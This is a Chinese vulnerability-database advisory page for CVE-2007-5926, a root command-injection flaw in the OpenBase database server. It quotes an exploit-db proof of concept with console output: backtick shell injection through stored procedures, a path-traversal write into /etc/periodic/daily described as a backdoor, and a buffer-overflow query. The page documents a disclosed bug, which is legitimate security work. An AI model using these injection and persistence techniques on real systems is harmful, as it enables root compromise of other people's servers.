OpenBase命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113901 漏洞类型 输入验证
发布时间 2007-11-05 更新时间 2007-11-12
CVE编号 CVE-2007-5926 CNNVD-ID CNNVD-200711-142
漏洞平台 Multiple CVSS评分 9.0
|漏洞来源
https://www.exploit-db.com/exploits/30742
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-142
|漏洞详情
OpenBase是一款数据库服务器应用,可提供对结构化数据的高速访问。OpenBase在实现存储过程时存在漏洞,远程验证用户可能利用AsciiBackup、OEMLicenseInstall以及其他可能的存储过程的参数shell字符执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/26347/info

OpenBase is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities.

An attacker could exploit these issues to execute arbitrary code or commands with superuser privileges. Successfully exploiting these issues will facilitate in the complete compromise of affected computers. 

1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Success
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1>  call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Failure
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root
|参考资料

来源:XF
名称:openbase-stored-command-execution(38291)
链接:http://xforce.iss.net/xforce/xfdb/38291
来源:BID
名称:26347
链接:http://www.securityfocus.com/bid/26347
来源:MISC
链接:http://www.netragard.com/pdfs/research/NETRAGARD-20070313-OPENBASE.txt
来源:SECUNIA
名称:27525
链接:http://secunia.com/advisories/27525